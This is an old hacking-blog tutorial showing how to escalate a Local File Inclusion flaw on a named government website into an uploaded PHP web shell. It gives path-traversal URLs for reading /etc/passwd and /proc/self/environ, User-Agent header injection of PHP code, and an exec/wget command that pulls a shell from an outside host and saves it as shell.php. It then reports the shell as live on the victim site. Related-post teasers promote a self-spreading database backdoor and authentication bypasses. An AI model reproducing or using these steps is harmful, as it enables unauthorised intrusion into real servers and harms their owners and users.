Monday, August 27, 2012

Local File Inclusion to shell upload


Tutorial provided by


Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd


Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agent
Go to New > New User-Agent



Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)

In User-Agent paste this in there.


Code:
<?php phpinfo();?>


Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.




Now search for "disable_functions" (Ctrl+F Search function)

Mine is

Code:
disable_functions     | no value    | no value


That is good.We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:

Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.

Related Posts:

  • Semi-nonalphanumeric & Self-Replicating Database Backdoor/Modifier Introduction: This is a release of my latest work. I've written a self-spreading backdoor script with nothing more but symbols (meaning without alpha or numeric values) for databases. Currently, it includes only MySQL db … Read More
  • Hybrid Multiple Layer EncryptionSomething rather rare on the interwebs nowadays. This tutorial is addressed to delve into the very foundation of hybrid data concealment and neuron model compressions. I have gone as much in-depth as my knowledge allows. Foll… Read More
  • Bypassing .htaccess/.htpasswd Based AuthenticationLittle off-topic:It's been some time since I posted some decent stuff related to hacking and as a whole in this section. Most of my recent activity was aimed at the PHP development section and mainly coding.Introduction:Thoug… Read More
  • DNS Rebinding/PAT/NAT/NAT Pinning & OverloadingI'd lie if I say I find it awkward that this hasn't been discussed here before. I'll go through the basic explanations so that you may know what we're gonna talk about. Basically this method enables us to access internal sour… Read More
  • Javascript Basics #2 Introduction: > This is a continuation of my first tutorial on Javascript Basics. In this one I'll go through break andcontinue 'mechanisms' for escaping loops, embedded objects, functions and event… Read More

0 comments:

Post a Comment